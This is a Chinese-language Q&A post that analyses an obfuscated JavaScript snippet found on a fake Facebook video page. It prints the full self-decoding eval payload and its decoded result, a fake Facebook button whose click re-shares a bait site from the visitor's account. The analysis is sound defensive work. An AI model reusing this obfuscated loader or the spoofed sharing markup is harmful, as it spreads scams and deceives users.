一位朋友刚刚在一个冒充 Facebook 的网站上分享了一个视频链接。查看该页面的源代码时，我发现了下面这段有意思的 JavaScript 代码：
<script type="text/javascript">
//<![CDATA[
<!--
// Obfuscated payload. `x` holds JavaScript *source* as a string, produced by an
// encoder. The first decoded layer is readable right here: f(x) walks the input
// two characters at a time and emits charAt(i+1) before charAt(i), i.e. it swaps
// adjacent character pairs, then calls f() on the next, still-scrambled layer.
// Reading the pair-swapped tail of that inner string suggests the following
// layer is a plain string reversal, and the reversed text at the very end
// (String.fromCharCode / charCodeAt / `^`) looks like a per-character XOR
// decoder — TODO confirm by decoding statically rather than by executing it.
var x="function f(x){var i,o=\"\",l=x.length;for(i=0;i<l;i+=2) {if(i+1<l)o+=" +
"x.charAt(i+1);try{o+=x.charAt(i);}catch(e){}}return o;}f(\"ufcnitnof x({)av" +
" r,i=o\\\"\\\"o,=l.xelgnhtl,o=;lhwli(e.xhcraoCedtAl(1/)3=!84{)rt{y+xx=l;=+;" +
"lc}tahce({)}}of(r=i-l;1>i0=i;--{)+ox=c.ahAr(t)i};erutnro s.buts(r,0lo;)f}\\" +
"\"(5)12\\\\,P\\\"RZEA3X02\\\\\\\\\\\\r7\\\\00\\\\\\\\]M)^97gs5400\\\\\\\\3*" +
"01\\\\\\\\kv7v01\\\\\\\\)iz w|#8 -/-=}v4ptWzYJLU01\\\\0\\\\\\\\\\\\\\\\N\\\\"+
"B^XT@V13\\\\0^\\\\G@EYEXnY\\\\\\\\3{03\\\\\\\\H@VZ0R00\\\\\\\\wi y:;8967452" +
"301Ra77\\\\1P\\\\4+T+2<4523:006\\\\00\\\\03\\\\\\\\30\\\\05\\\\02\\\\\\\\23" +
"\\\\0T\\\\02\\\\0L\\\\35\\\\06\\\\02\\\\\\\\33\\\\07\\\\03\\\\\\\\20\\\\0K\\"+
"\\\\\\t6\\\\01\\\\\\\\02\\\\05\\\\03\\\\\\\\37\\\\02\\\\00\\\\\\\\16\\\\0R\\"+
"\\]X22\\\\03\\\\00\\\\\\\\01\\\\07\\\\01\\\\\\\\QY/Z)1>g,.847%i5><;9>';#5h0" +
"2\\\\\\\\\\\\u\\\\\\\"*\\\\0<b04c03\\\\\\\\WIcYI^TV4T02\\\\\\\\ti\\\\\\\\[W" +
"21\\\\0F\\\\JF21\\\\0B\\\\Xw0u01\\\\\\\\zIxW03\\\\04\\\\03\\\\\\\\IW1{<!8%(" +
"EJ5f(vv7c17\\\\\\\\.mP/cm&n0uC1-vol35\\\\0S\\\\16\\\\06\\\\01\\\\\\\\35\\\\" +
"04\\\\02\\\\\\\\21\\\\0Y\\\\37\\\\0Z\\\\I[02\\\\05\\\\00\\\\\\\\04\\\\07\\\\"+
"00\\\\\\\\1L0Q01\\\\\\\\30\\\\02\\\\03\\\\\\\\0H00\\\\\\\\13\\\\04\\\\01\\\\"+
"\\\\CX\\\\\\\\\\\\\\\\17\\\\01\\\\00\\\\\\\\-/`rxe05\\\\0c\\\\7oa7aejr!=#!j" +
"(0r~7~t8&3(22\\\\0J\\\\SS2]03\\\\\\\\02\\\\0\\\\\\\\\\\\\\\\[\\\\WY16\\\\0G" +
"\\\\VZJY0Y00\\\\\\\\EXOE10\\\\04\\\\03\\\\\\\\L@FV4Q01\\\\\\\\qS77\\\\1n\\\\"+
"7<z{cqcsvx1Zc<doJ~p0nddk.bov0o03\\\\\\\\ _7F03\\\\\\\\25\\\\01\\\\00\\\\\\\\"+
"03\\\\05\\\\00\\\\\\\\VU6/00\\\\\\\\\\\\t5\\\\02\\\\\\\\1;03\\\\03\\\\00\\\\"+
"\\\\37\\\\06\\\\03\\\\\\\\34\\\\0*\\\\23\\\\05\\\\00\\\\\\\\00\\\\0n\\\\\\\\"+
"\\\\\\\\rr\\\\\\\\\\\\\\\"\\\\\\\\\\\\\\\"\\\\\\\\\\\\31\\\\0|\\\\01\\\\0a\\"+
"\\)(48v45;!#pmno\\\\m\\\\\\\"7\\\\02\\\\\\\\5802\\\\\\\\yh1d03\\\\\\\\/(,#2" +
"3\\\\0`\\\\RPOH{OTL[S\\\\Z\\\\\\\\q\\\\vs17\\\\0@\\\\XB__\\\\k\\\\\\\\D\\\\" +
"KCLJca=f Bhou{7{I4a/ewf~}a1,fxu{fs_&d?7l00\\\\\\\\\\\\t7\\\\01\\\\\\\\X[C%Q" +
"^32\\\\02\\\\03\\\\\\\\^T7V03\\\\\\\\01\\\\0I\\\\\\\\A\\\\\\\\X\\\\YFV^BJ\\" +
"\\t4\\\\01\\\\\\\\20\\\\01\\\\02\\\\\\\\0?9;-5u}77\\\\1'\\\\h%!7j!\\\\ \\\\" +
"\\\"/\\\\ck%&f**>!'5&/oZZJT[O\\\\\\\\\\\\\\\\PJ]S5@03\\\\\\\\FE0G00\\\\\\\\" +
"01\\\\07\\\\02\\\\\\\\\\\\\\\\\\\\\\\\^_5A02\\\\\\\\0R00\\\\\\\\blK|5G03\\\\"+
"\\\\rz7|17\\\\\\\\vth&77\\\\1f\\\\f;`vxp!|77\\\\1i\\\\ky{ak(gji-on34\\\\00\\"+
"\\03\\\\\\\\37\\\\02\\\\03\\\\\\\\34\\\\0W\\\\17\\\\00\\\\00\\\\\\\\01\\\\0" +
"Z\\\\I[02\\\\05\\\\00\\\\\\\\04\\\\07\\\\00\\\\\\\\EI5^00\\\\\\\\17\\\\01\\" +
"\\03\\\\\\\\07\\\\00\\\\02\\\\\\\\^F6C00\\\\\\\\14\\\\06\\\\01\\\\\\\\16\\\\"+
"0x\\\\`~\\\\|\\\\\\\";\\\\(5?$z1>6$(`<kd#=7-02\\\\\\\\\\\"\\\\\\\\\\\\*5 (i" +
"ev$7G17\\\\\\\\UHT_[]AsTQ34\\\\0E\\\\J^XCDO2N02\\\\\\\\01\\\\07\\\\01\\\\\\" +
"\\HCPKDV=G Bxwusy{5yrzbb-,c&n``~pzq(fjto1c02\\\\\\\\31\\\\0\\\\\\\\(\\\"}fo" +
";n uret}r);+)y+^(i)t(eAodrCha.c(xdeCoarChomfrg.intr=So+7;12%={y+)i+l;i<0;i=" +
"r(foh;gten.l=x,l\\\"\\\\\\\"\\\\o=i,r va){,y(x fontincfu)\\\"\")" ;
// Decoder "engine": eval() the current string, store the result back into x
// and go again, stopping only when eval() returns a falsy value. Each round
// strips one layer and immediately runs the next; the fully decoded layer (see
// the answer below) ends in `;0`, which is what finally terminates the loop.
// Assignment-inside-condition plus eval() is the whole unpacker — a strong
// indicator of hostile script that should be decoded in isolation, not by
// letting a browser run it.
while(x=eval(x));
看起来它把“badc”变成了“abcd”（交换相邻的两个字符），然后对结果再次 eval。
有哪位 JavaScript 专家能看出它最终会执行什么恶意内容吗？
答案 0 :(得分:6)
// Final decoded layer: writes markup straight into the page via document.writeln().
// The click handler calls getsome() and wopen2() — neither is shown on this page,
// presumably they live in the host page's own scripts — and opens the Facebook
// sharer for http://www.thegreatvideo.weebly.com/, so a click presumably re-shares
// that same site from the visitor's account (the bait-spreading step). The trailing
// `0;` makes eval() of this layer return 0, which is what stops the while(x=eval(x))
// unpacker loop. Note the first <span> is closed by a stray </div>, so the injected
// fragment is malformed HTML.
document.writeln("<span onclick=\"getsome();document.getElementById('close_div').style.display = 'none'; wopen2('http://www.facebook.com/sharer/sharer.php?locale=fi_FI&u=http://www.thegreatvideo.weebly.com/&src=sp','video_prom',160,30,'no','no');\" style=\"cursor: pointer;\" class=\"FBConnectButton FBConnectButton_Small\"> \r\n <span class=\"FBConnectButton_Text\" style=\"font-family:Arial, Helvetica, sans-serif; font-weight:bold; font-size:18px; color:#365ba8;\"></span> <img src=\"http://i.imgur.com/uG46r.gif\" border=\"0\"> </div> \r\n \r\n<div id=\"close_div\" style=\"position:absolute;top:0;left:0;display:block;z-index:100004;\"> \r\n <div style=\"position:relative;width:165px;height:25px;\"> \r\n</div></div>");0;
这段代码实际上是在页面上插入一个伪装成 Facebook 按钮的元素。
<!-- The same markup as the document.writeln() string above, re-flowed for reading.
     The JavaScript string escapes (\" and \r\n) were left in place; they are not part
     of the HTML the browser actually receives. Two things stand out: the outer <span>
     is closed by </div>, so the fragment is malformed, and the onclick handler opens
     the Facebook sharer URL for www.thegreatvideo.weebly.com via wopen2() after
     calling getsome() — neither function is shown on this page. -->
<span
onclick="getsome();document.getElementById('close_div').style.display = 'none'; wopen2('http://www.facebook.com/sharer/sharer.php?locale=fi_FI&u=http://www.thegreatvideo.weebly.com/&src=sp','video_prom',160,30,'no','no');\"
style=\"cursor: pointer;\"
class=\"FBConnectButton FBConnectButton_Small\"
>
\r\n
<span
class=\"FBConnectButton_Text\"
style=\"font-family:Arial, Helvetica, sans-serif; font-weight:bold; font-size:18px; color:#365ba8;\"
></span>
<img
src=\"http://i.imgur.com/uG46r.gif\"
border=\"0\"
>
</div>
\r\n \r\n
<div
id=\"close_div\"
style=\"position:absolute;top:0;left:0;display:block;z-index:100004;\"
>
\r\n
<div
style=\"position:relative;width:165px;height:25px;\"
>
\r\n
</div>
</div>
神奇:
// Assignment inside the loop condition: eval() the current string, keep the result
// as the next string, and stop only when eval() yields a falsy value (the decoded
// payload ends in `;0`). There is no fixed iteration count — the data itself decides
// how many layers get executed, which is why the number of rounds is not obvious
// from the loop.
while(x=eval(x));
它被层层包装。代码字符串必须被重新 eval 3 次才能得到真正的代码，所以这基本上是自修改的源代码。我猜是用某个自动化工具生成了这个变量，使其经过多次求值后能还原出“恶意”代码，然后反复调用 eval。